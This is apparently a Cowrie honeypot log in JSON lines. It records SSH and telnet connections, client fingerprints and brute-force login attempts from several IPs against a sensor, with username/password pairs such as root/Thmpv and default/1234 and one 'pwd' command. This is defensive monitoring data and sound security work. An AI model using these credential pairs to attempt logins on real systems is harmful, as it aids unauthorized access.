{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58306,"dst_ip":"1.2.3.4","dst_port":22,"session":"50da4d4fc8cb","protocol":"ssh","message":"New connection: 212.227.235.229:58306 (1.2.3.4:22) [session: 50da4d4fc8cb]","sensor":"my-vps","timestamp":"2025-08-31T05:42:35.466058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:35.466986Z","src_ip":"212.227.235.229","session":"50da4d4fc8cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:35.756729Z","src_ip":"212.227.235.229","session":"50da4d4fc8cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:36.956606Z","src_ip":"212.227.235.229","session":"50da4d4fc8cb"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:37.247493Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:37.248323Z","src_ip":"212.227.235.229","session":"50da4d4fc8cb"}
{"eventid":"cowrie.session.closed","duration":12.794790744781494,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:40.111006Z","src_ip":"212.227.125.160","session":"bd0257daa776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35258,"dst_ip":"1.2.3.4","dst_port":23,"session":"d76b2e55a599","protocol":"telnet","message":"New connection: 212.227.125.160:35258 (1.2.3.4:23) [session: d76b2e55a599]","sensor":"my-vps","timestamp":"2025-08-31T05:42:40.322006Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":54232,"dst_ip":"1.2.3.4","dst_port":22,"session":"11e3f06b8f10","protocol":"ssh","message":"New connection: 201.148.180.50:54232 (1.2.3.4:22) [session: 11e3f06b8f10]","sensor":"my-vps","timestamp":"2025-08-31T05:42:41.087100Z"}
{"eventid":"cowrie.session.closed","duration":"31.1","message":"Connection lost after 31.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:41.557655Z","src_ip":"212.227.235.229","session":"b6c767e11de3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:42.287877Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:42:42.288612Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41680,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bf1307e3e25","protocol":"ssh","message":"New connection: 212.227.125.160:41680 (1.2.3.4:22) [session: 5bf1307e3e25]","sensor":"my-vps","timestamp":"2025-08-31T05:42:42.846713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:45.432667Z","src_ip":"212.227.125.160","session":"5bf1307e3e25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:42:45.451887Z","src_ip":"212.227.125.160","session":"5bf1307e3e25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51498,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d195594ae5a","protocol":"ssh","message":"New connection: 212.227.235.229:51498 (1.2.3.4:22) [session: 6d195594ae5a]","sensor":"my-vps","timestamp":"2025-08-31T05:42:45.958692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:46.603693Z","src_ip":"212.227.235.229","session":"6d195594ae5a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:42:46.626702Z","src_ip":"212.227.235.229","session":"6d195594ae5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Thmpv","message":"login attempt [root/Thmpv] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:47.579635Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:51.564993Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T05:42:51.565805Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64394,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6da08f882a3","protocol":"ssh","message":"New connection: 212.227.125.160:64394 (1.2.3.4:22) [session: c6da08f882a3]","sensor":"my-vps","timestamp":"2025-08-31T05:42:52.552121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:42:52.553118Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123456","message":"login attempt [test2/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:52.569556Z","src_ip":"212.227.235.229","session":"6d195594ae5a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:42:52.654208Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:53.060462Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:53.072389Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:53.073476Z","src_ip":"201.148.180.50","session":"11e3f06b8f10"}
{"eventid":"cowrie.session.closed","duration":12.785609483718872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:53.107527Z","src_ip":"212.227.125.160","session":"d76b2e55a599"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35495,"dst_ip":"1.2.3.4","dst_port":23,"session":"72c1ccaabaa7","protocol":"telnet","message":"New connection: 212.227.125.160:35495 (1.2.3.4:23) [session: 72c1ccaabaa7]","sensor":"my-vps","timestamp":"2025-08-31T05:42:53.319740Z"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:54.147800Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:54.357644Z","src_ip":"212.227.235.229","session":"6d195594ae5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52428,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0957e3fdf35","protocol":"ssh","message":"New connection: 212.227.235.229:52428 (1.2.3.4:22) [session: a0957e3fdf35]","sensor":"my-vps","timestamp":"2025-08-31T05:42:54.417592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:54.426348Z","src_ip":"212.227.235.229","session":"a0957e3fdf35"}
{"eventid":"cowrie.login.failed","username":"default","password":"1234","message":"login attempt [default/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:55.230956Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:56.314890Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:56.470360Z","src_ip":"212.227.235.229","session":"a0957e3fdf35"}
{"eventid":"cowrie.login.failed","username":"atl","password":"atl","message":"login attempt [atl/atl] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:57.305773Z","src_ip":"212.227.235.229","session":"a0957e3fdf35"}
{"eventid":"cowrie.login.failed","username":"default","password":"abcd123","message":"login attempt [default/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:57.396768Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49428,"dst_ip":"1.2.3.4","dst_port":22,"session":"27c0a8a74724","protocol":"ssh","message":"New connection: 212.227.235.229:49428 (1.2.3.4:22) [session: 27c0a8a74724]","sensor":"my-vps","timestamp":"2025-08-31T05:42:57.453369Z"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:58.480024Z","src_ip":"212.227.125.160","session":"c6da08f882a3"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:58.590078Z","src_ip":"212.227.235.229","session":"a0957e3fdf35"}
{"eventid":"cowrie.session.closed","duration":12.795920372009277,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:06.115588Z","src_ip":"212.227.125.160","session":"72c1ccaabaa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35749,"dst_ip":"1.2.3.4","dst_port":23,"session":"44700e29a3c1","protocol":"telnet","message":"New connection: 212.227.125.160:35749 (1.2.3.4:23) [session: 44700e29a3c1]","sensor":"my-vps","timestamp":"2025-08-31T05:43:06.333706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:43:06.955059Z","src_ip":"212.227.235.229","session":"27c0a8a74724"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:43:06.956179Z","src_ip":"212.227.235.229","session":"27c0a8a74724"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41796,"dst_ip":"1.2.3.4","dst_port":22,"session":"a198464edab7","protocol":"ssh","message":"New connection: 212.227.125.160:41796 (1.2.3.4:22) [session: a198464edab7]","sensor":"my-vps","timestamp":"2025-08-31T05:43:07.011914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:43:07.410249Z","src_ip":"212.227.125.160","session":"a198464edab7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:43:07.431483Z","src_ip":"212.227.125.160","session":"a198464edab7"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123456","message":"login attempt [test2/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:10.007847Z","src_ip":"212.227.125.160","session":"a198464edab7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48126,"dst_ip":"1.2.3.4","dst_port":22,"session":"24f77bb1da2b","protocol":"ssh","message":"New connection: 212.227.235.229:48126 (1.2.3.4:22) [session: 24f77bb1da2b]","sensor":"my-vps","timestamp":"2025-08-31T05:43:11.554559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:11.555335Z","src_ip":"212.227.235.229","session":"24f77bb1da2b"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:11.572572Z","src_ip":"212.227.125.160","session":"a198464edab7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:11.825681Z","src_ip":"212.227.235.229","session":"24f77bb1da2b"}
{"eventid":"cowrie.session.connect","src_ip":"58.144.199.22","src_port":43736,"dst_ip":"1.2.3.4","dst_port":22,"session":"780c6f17e863","protocol":"ssh","message":"New connection: 58.144.199.22:43736 (1.2.3.4:22) [session: 780c6f17e863]","sensor":"my-vps","timestamp":"2025-08-31T05:43:12.112097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:12.113047Z","src_ip":"58.144.199.22","session":"780c6f17e863"}
